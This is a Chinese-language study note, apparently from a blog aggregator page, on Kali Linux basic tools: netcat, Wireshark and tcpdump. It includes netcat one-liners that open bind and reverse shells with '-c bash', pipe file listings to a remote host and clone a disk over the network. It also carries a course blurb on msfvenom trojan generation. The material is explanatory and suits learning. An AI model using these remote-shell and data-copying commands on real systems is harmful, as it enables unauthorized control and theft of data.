  • 包括配置树莓派、渗透测试前准备、收集网络信息、捕获数据包、漏洞扫描、渗透测试等这几大章节;适合动手能力强的童鞋。(备注:本教程着重关注树莓派版的kalilinux(精减版) ,如果你关注的是非精减版的kaliLinux ...
  • Kali Linux渗透测试

    千次阅读 2019-07-07 16:19:05
    Kali Linux渗透测试 Kali Linux VirtualBox 虚拟机安装 Kali Linux 持久加密USB安装
    展开全文
  • 本课程主要分享Kali Linux渗透测试之Msfvenom木马生成与攻防实战技巧!二、适合人员       1、零基础大学生       2、IT技术人员       3、服务器运维工程师   &...
  • kali linux 渗透测试学习笔记——kali linux 基本工具 这里只简单述说一下工具的功能~~ 常用工具 经常使用且功能强大 安全从业者必不可少的帮手 NC / ncat wireshark tcpdump NETCAT - NC 网络工具中的瑞士军刀-小...

    kali linux 渗透测试学习笔记——kali linux 基本工具


    这里只简单述说一下工具的功能~~

    常用工具

    • 经常使用且功能强大
    • 安全从业者必不可少的帮手
    • NC / ncat
    • wireshark
    • tcpdump

    NETCAT - NC

    1. 网络工具中的瑞士军刀-小身材,大智慧
    2. 侦听模式 / 传输模式
    3. telnet / 获取banner信息
    4. 传输文本信息
    5. 传输文件 / 目录
    6. 加密传输文件
    7. 远程控制 / 木马
    8. 加密所有流量
    9. 流媒体服务器
    10. 远程克隆硬盘

    NC —— telnet / banner

    nc -h 查看参数的使用 -v显示详细的信息 -n跟一个ip
    客户端连接服务器端口,可以看到banner信息
    nc -nv 1.1.1.1 110	110端口为POP3(邮件协议3)服务开放的
    nc -nv 1.1.1.1 25	25端口为SMTP服务器所开放,主要用于发送邮件
    nc -nv 1.1.1.1 80	80端口是为HTTP超文本传输协议开放的
    

    NC —— 传输文本信息

    比如说简单实现两个人来聊天等~~
    A:nc -l -p 4444		其中一台开放一个端口,-l侦听一个端口,-p打开一个端口
    B:nc -nv 1.1.1.1 4444	另一台作为客户端连接开放的端口
    一端终止,两边都终止	
    
    远程电子取证
    尽量少的修改被审计计算机文件的内容,避免破坏证据
    在本机监听并开放端口,在取证的计算机上执行nc操作
    
    本机:nc -l -p 4444
    需取证的计算机:ls -l | nc -nv 1.1.1.1 4444
    
    即可在本机显示取证计算机的文件目录,也就是远程电子取证的信息收集
    
    本机:nc -l -p 4444 > ps.txt							把文件传来的信息存到ps.txt中
    需取证的计算机:ps aux | nc -nv 1.1.1.1 4444 -q 1	-q执行后等一秒钟,断开连接
    
    这里主要是通过nc来收集电子取证的一些信息
    

    NC —— 传输文件 / 目录

    传输文件
    接收端打开端口:
    A:nc -lp 333 > 1.mp4					接收端口内容>输出到1.MP4中
    B:nc -nv 1.1.1.1 333 < 1.mp4 -q 1 		<输入到nc的端口里面
    或者
    发送端打开端口
    A:nc -q 1 -lp 333 < 1.mp4
    B:nc -nv 1.1.1.1 333 > 1.mp4			按下回车就会建立连接
    
    传输目录
    先打包再传输~
    A:tar -cvf - music/ | nc -lp 333 -q 1
    B:nc -nv 1.1.1.1 333 | tar -xvf - 		目录从A到B
    
    加密传输文件
    A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
    B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
    加密方式和解密方式必须得对应
    

    NC —— 流媒体服务

    A:cat 1.mp4 | nc -lp 333
    B:nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
    

    NC —— 端口扫描

    nc -nvz 1.1.1.1 1-65535
    nc -vnzu 1.1.1.1 1-1024	UDP开放端口
    不如nmap强大,功能也没有那么多
    

    NC —— 远程克隆硬盘

    A: nc -lp 333 | dd of=/dev/sda 
    B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1 
    
    远程电子取证,可以将目标服务器硬盘远程复制,或者内存
    完完全全复制到一个新的硬盘上去,一模一样
    

    NC —— 远程控制

    正向:
    A:nc -lp 333 -c bash	连接建立之后,执行一个shell脚本
    B:nc 1.1.1.1 333		连接之后可执行bash命令控制A
    
    反向:
    A:nc -lp 333		连接之后可执行bash命令控制B
    B:nc 1.1.1.1 333 -c bash	被控制
    
    有点像qq上的远程控制~~
    注:windows用户把bash改成cmd
    

    NC —— NCAT(kali2.0好像木有这个命令~)

    NC缺乏加密和身份验证的能力,数据都是以明文形式进行传输,可以被进行ARP欺骗,被嗅探等,
    同时也缺乏身份验证,开放的端口容易被别人扫描到,被别人利用~
    
    NCAT弥补了NC缺乏加密和身份验证的能力
    NCAT包含于nmap工具包中
    
    A:ncat ncat -c bash -allow 192.168.20.14 -vnl 333 -ssl		
    -allow只允许哪一个ip连接,-ssl加密
    
    B:ncat -nv 1.1.1.1 333 -ssl								
    -ssl保证两边加解密方式一样
    
    传输的数据都是被加密的,因为管道本身就是被加密的,嗅探抓包是看不见传输内容的!
    实现方式与NC有本质的区别!!!基于IP地址的身份验证!!!
    
    nc虽然强大,但是有很多的版本,不同系统 / 平台的nc参数功能不尽相同,
    例如ubuntu的nc中没有-c这个参数,所以在不同平台使用时注意参数和命令的不同之处
    

    WIRESHARK

    • 抓包嗅探协议分析
    • 安全专家必备技能
    • 抓包引擎
      • Libpcap9——Linux
      • Winpacap10——Windows
    • 解码能力

    WIRESHARK —— 基本使用方法

    • 简单的使用方法如下:
    • 启动
      在这里插入图片描述
    • 选择抓包网卡,还可以进行筛选
      在这里插入图片描述
    • 实施抓包,双击网卡,或者如下:
      在这里插入图片描述
    • 保存和分析捕获文件,先停止:
      在这里插入图片描述
      保存之后如要继续分析,直接拖入即可查看:
      在这里插入图片描述
    • 首选项
      在这里插入图片描述
      可以进行个性化的设置:
      在这里插入图片描述
      例如添加两列,源MAC地址,目的MA地址:
      在这里插入图片描述
      在这里插入图片描述

    WIRESHARK —— 筛选器

    • 过滤掉干扰的数据包
    • 抓包筛选器
      和显示筛选器差不多,只不过一开始就进行筛选:
      在这里插入图片描述
      在这里插入图片描述
    • 显示筛选器
      可以根据不同的条件筛选不同的包
    ip.addr == 192.168.1.122	 //根据IP地址筛选,包括源ip或者目的IP
    ip.src == 192.168.1.122		 //根据源IP地址筛选
    ip.dst == 192.168.1.122		//根据目的IP地址筛选
    ...........
    

    在这里插入图片描述
    WIRESHARK —— 常见协议包

    • 数据包的分层结构:通过分层结构可以清晰观察协议
    • ARP
    • ICMP—— ping包
    • TCP——三次握手
    • UDP
    • DNS
    • HTTP
    • FTP

    WIRESHARK —— TCP流

    • 右键追踪TCP流~~~
    • 数据流:追踪可查看详细的数据
      • HTTP——明文传输
      • SMTP
      • POP3
      • SSL——密文传输

    WIRESHARK —— 信息统计
    位于:
    在这里插入图片描述
    可以查看以下几个方面的信息:

    • 节点数
    • 协议分析
    • 包大小分布
    • 会话连接
    • 解码方式
      在这里插入图片描述
    • 专家系统
      在这里插入图片描述
    • 一般抓包都是成千上万的,查找异常的时候基本都是从信息统计入手,这样方便更快速的查找异常的流量,比一个一个来效率高多了!!!

    WIRESHARK —— 实践

    • 抓包对比nc和ncat加密和不加密的流量
    • nc下的:
      在这里插入图片描述
      可怜我的kali好像没有ncat命令,,,,,
      在这里插入图片描述
      也没有找到解决方案,,,,我也是服了,难道只有kali1有吗??
      望有知道的大佬告知一下,感谢感谢!!
      就不说了,反正使用ncat的时候,抓到的数据是加密后的,很难看出明文!!!!

    TCPDUMP

    • No-GUI的抓包分析工具
    • Linux、Unix系统默认安装
    • 与wireshark不一样,不是图形化界面

    TCPDUMP —— 抓包

    • 抓包
      • 默认只抓68个字节
      • tcpdump -i eth0 -s 0 -w file.pcap -s表示抓多大,0表示有多大抓多大,-w保存文件
      • tcpdump -i eth0 port 22 相当于过滤,只抓port22的包
    • 读取抓包文件
      • tcpdump -r file.pacp

    TCPDUMP——筛选

    • tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u
    • tcpdump -n src host 145.254.160.237 -r http.cap 根据来源IP显示
    • tcpdump -n dst host 145.254.160.237 -r http.cap 根据目标ip显示
    • tcpdump -n port 53 -r http.cap 显示端口为53内容
    • tcpdump -nX port 80 -r http.cap 16进制方式显示端口为80内容

    TCPDUMP——高级筛选

    • tcpdump -A -n ‘tcp[13] = 24’ -r http.cap 显示第13号字节为24的包
    展开全文
  • Kali Linux渗透测试的艺术,kalilinux渗透测试的艺术pdf,PDF文档.zip

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 9,474
精华内容 3,789
关键字:

kalilinux渗透测试

linux 订阅